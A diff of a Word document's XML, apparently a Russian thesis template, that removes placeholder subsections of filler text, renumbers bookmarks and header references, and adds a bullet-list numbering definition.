-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc210601683"/>
-      <w:r>
-        <w:t>Подраздел 3</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="12"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc210601684"/>
-      <w:r>
-        <w:t>Подраздел 3 уровня 1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="13"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Общий список требований включает такие моменты:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст текст.</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc210601685"/>
-      <w:r>
-        <w:t>Подраздел 3 уровня 2</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="14"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="851"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:ind w:firstLine="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -6308,13 +5195,13 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc518292931"/>
-      <w:bookmarkStart w:id="16" w:name="_Toc210601686"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc518292931"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc231073623"/>
       <w:r>
         <w:t>ЗАКЛЮЧЕНИЕ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6342,7 +5229,7 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc518292932"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc518292932"/>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
@@ -6359,13 +5246,13 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc210601687"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc231073624"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6378,7 +5265,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc518292933"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc518292933"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -6516,7 +5403,7 @@
       <w:r>
         <w:t>-сетях //Проблемы информационной безопасности. Компьютерные системы. – 2019. – №. 2. – С. 65-72.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6531,8 +5418,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId14"/>
-      <w:headerReference w:type="default" r:id="rId15"/>
+      <w:headerReference w:type="even" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId13"/>
       <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
       <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="680" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -7003,8 +5890,8 @@
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="09274B4F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="2120447E"/>
-    <w:lvl w:ilvl="0" w:tplc="2EA85474">
+    <w:tmpl w:val="D8840132"/>
+    <w:lvl w:ilvl="0" w:tplc="371CA91E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:pStyle w:val="ListParagraph"/>
@@ -7401,6 +6288,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1BD32F19"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="430A5574"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1FE419A9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4B98715C"/>
@@ -7513,7 +6549,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="21671BB4"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FFE8276A"/>
@@ -7626,7 +6662,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="25D80E03"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="281E8F86"/>
@@ -7739,7 +6775,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2B897451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
